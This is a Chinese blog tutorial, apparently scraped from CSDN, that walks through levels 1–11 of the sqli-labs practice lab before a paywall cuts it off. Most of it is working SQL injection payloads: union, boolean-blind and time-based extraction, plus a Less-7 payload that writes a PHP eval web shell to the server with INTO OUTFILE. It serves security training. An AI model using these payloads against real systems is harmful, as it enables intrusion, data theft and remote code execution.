sqli-labs 1-65教程

最新推荐文章于 2024-04-19 22:26:32 发布
VIP文章 最新推荐文章于 2024-04-19 22:26:32 发布
阅读量1.3w 收藏 73
点赞数 11
分类专栏: web安全 文章标签: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/harrywade/article/details/81842491
版权

导语

做完DVWA感觉还是对sql注入了解不够多,尝试做了一下这个实验。
里面是所有的payload和一些解释。

Less1-35

Less-1
Please input the ID as parameter with numeric value
尝试输入ID=1’ 这是一个字符型注入
Payload : id=1’

Less-2
这是一个数字型注入
Payload : ?id=9 union select 1,database(),user()

Less-3
生成的注入语句SELECT * FROM users WHERE id=(‘2’) – ‘) LIMIT 0,1
也就是把2’)注入进去构造成正常的语句,然后再–注释掉
单引号括号注入
Payload:?id=2’) –+

Less-4
?id=1’ 单引号正常
?id=1” 双引号报错 right syntax to use near ‘“1”“)
得出这个一个双引号括号的注入
Payload:?id=1”) –+

Less-5
Payload:?id=1’ 报错right syntax to use near ”1”
这是一个单引号的注入

Less-6
Payload:?id=1” 报错syntax to use near ‘“1””
这是一个双引号的注入
Less-7
转储文件get字符型注入
通过payload 我们成功一句话木马导入到指定的路径
导入:
Payload:?id=1')) union select 1,'2','<?php @eval($_POST["xx"]);?>' into outfile 'D:\\phpStudy\\PHPTutorial\\WWW\\sqli-labs-master\\xiaoha2i.php' %23
导出:
Payload:id=(('1')) union select 1,load_file ('D:\\phpStudy\\PHPTutorial\\WWW\\sqli-labs-master\\xiaoha2i.php'),'3' #'))

Less-8 Blind- Boolian- Single Quotes- String 盲注单引号注入
盲注简单理解就是不回显数据的注入,只通过页面是否正确返回来判断
Payload:?id=1’ and LENGTH(database())>=5 %23 通过这个判断数据库长度
Payload:?id=1’ and ascii(substr(database(),1,1))>=115 %23 判断某个字符串的ascii
通过更改substr(1,1)来获取不同位置的字符串的数据
Payload:?id=1’ and (select count(table_name) from information_schema.tables where table_schema=’security’)>=4 判断这个数据库有多少个表
Payload:?id=1’ and (select length(table_name) from information_schema.tables where table_schema=’security’ LIMIT 0,1)>=9 判断第一张表的长度
limit 第一个参数是指记录开始的index,从0开始,表示第一条记录。
Limit 第二个参数表示取多少条
Payload:?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1,1))>=102 获取第一张表的第一个字符串ascii是否大于102
Payload:?id=1’ and (select count(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’)>=3 获取db=security table=users 的表里面有多少字段,是否大于等于3个字段
group by 组合查询

Less-9 -基于时间的GET单引号盲注
因为不管我们怎么输入,返回的都是同样的信息,但是我们又想知道是否存在注入,我们通过sleep(5)延时来判断是否成功执行了sql语句
payload:?id=1’ and sleep(5) %23
payload:?id=1’ and if(ascii(substr(database(),1,1))>115, 0, sleep(5)) %23

Less-10 -基于时间的GET双引号盲注
同上,只是由单引号变为双引号
payload:?id=1” and sleep(5) %23
payload:?id=1” and if(ascii(substr(database(),1,1))>115, 0, sleep(5)) %23

Less-11-基于错误的post单引号注入
截图 SELECT username, password FROM users WHERE username=’test ’ or 1=1 #’ and password=’aaaa’ LIMIT 0,1
payload-post:username=test ’ o

最低0.47元/天 解锁文章
「已注销」
关注
  • 11
    点赞
  • 73
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
web渗透-------WEB漏洞(SQL注入
hhhjjjllll的博客
05-09 1302
在mysql5.0以后的版本存在一个information_schema数据库、里面存储记录数据库名、表名、列名的数据库。(专门管理数据库的账户),root为最高权限,容易导致跨站注入数 据。普通用户:只能注入自己网站。相当于可以通过information_schema这个数据库获取到数据库下面的表名和列名。into outfile 或into dumpfile 文件写入。5)其他网站路径(进行文件读取,为高权限读取做准备)(不同的系统对数据库操作语句的大小写区分)当前网站的数据库是security。
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 12万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs靶场学习(一)
最新发布
Dug123456_的博客
04-19 835
数据库是一个用于存储和管理数据的仓库。数据按照特定的格式存储,可以对数据库中的数据进行增加、修改、删除和查询操作。数据库的本质是一个文件系统,按照一定的逻辑结构组织数据,以方便高效地访问和维护。
sqli-labs大详解(完结)
hxhxhxhxx的博客
07-28 5万+
sqlilabs详解(不断更新)题目1-10Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)GET - Error based - Intiger based (基于错误的GET整型注入)Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)Less-4 GET - Error based - Double Quotes
sqli-labs详解------持续更新
yuqie的博客
06-20 2228
如今已经很少使用手动注入了,写这篇的初心在于掌握并熟记手动注入,
SQL注入sqli-labs
m0_60716947的博客
04-08 7150
目录 (一)搭建 sqli-labs 靶场 (二)sqli-labs的第一关至第四关笔记 (1)第一关 sqli-labs 是一款基于 sql 注入的游戏教程,有利于更好地了解 sql 注入的语法。 (一)搭建 sqli-labs 靶场 搭建 sqli-labs 靶场前首先要下载 phpstudy phpstudy下载链接:https://www.xp.cn 要保证安装路径中不能有空格和中文。 下载完成后: 可以对 root 数据库进行修改密码或创建数据库,然后在软件管理..
sqli-labs通关详解
m0_52051132的博客
10-15 6722
sqlmap.py -r ./xx.txt --batch --level 3 --tamper=“base64encode.py” --current-db 爆破表单。sqlmap.py -u ip --data=“uname=admin&passwd=admin” --batch -D security --tables 最后脱库。条件正确有回显,条件错误没有回显,布尔盲注?py -r 文件位置 -p 扫描位置 --batch -D security -T users --dump //脱库。
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs训练平台靶场详解!!!!
ytdd66的博客
03-19 2190
下面选取几个具有代表性的关卡,演示几种 SQL 注入漏洞利用方法。
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
Jay17的博客
08-03 2万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
Sqli-labs环境搭建教程sql注入
Victor1889的博客
01-06 8786
Sqli-labs环境搭建教程sql注入
sqli-labs靶场安装
剁椒鱼头没剁椒的博客
10-22 6522
PhpStudy国内12年老牌公益软件,集安全,高效,功能与一体,已获得全球用户认可安装,运维也高效。支持一键LAMP,LNMP,集群,监控,网站,FTP,数据库,JAVA等100多项服务器管理功能。Sqlilabs是一个学习sql注入的平台,GET和POST场景包括了许多基本的实验内容,例如:基于错误的注入、盲注、更新查询注入、插入查询注入、Header注入、二次注入、Bypass WAF、堆叠注入等等。
SQLi-Labs 安装
SunJ3t的菠萝屋
05-24 6438
1. 前言 我们在刚学习 SQL 注入的时候,往往都需要一个能 SQL 注入的网站进行 SQL 注入学习。如果直接去网上寻找存在 SQL 注入的网站对新手来说有些难度,因此我们一般都是在本地搭建一个能 SQL 注入测试的网站。 这里就来讲解一下 SQLi-Labs 的下载,安装,搭建教程。 注意: PHP 版本一定要设置成 PHP5 以上,PHP7 以下,PHP5 以上才有 information_schema 库,PHP7 之后的 mysql_ 都改成了 mysqli_** 了,所以用其他版本的 PHP
sqli-labs 通关笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 2391
sqli-labs靶场之前建议补一下基础。
SQL注入Sqli-labs注入环境搭建》
weixin_47118413的博客
04-06 8207
本文章讲解如何通过Linux(Centos 7)和Windows部署Sqli-labs环境进行sql注入漏洞相关练习,后期会更新关卡教程
Sqli-lab教程-史上最全详解(1-22通关)
qq_52364123的博客
04-10 7960
sql注入集合
sqli-labs教程
07-13
1. 下载sqli-labs-master压缩包并解压缩。 2. 安装LAMP或WAMP环境,确保Apache、MySQL和PHP已经安装并配置好。 3. 将解压缩后的sqli-labs-master文件夹复制到Apache或WAMP的web目录下。 4. 在MySQL中创建一个名为...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值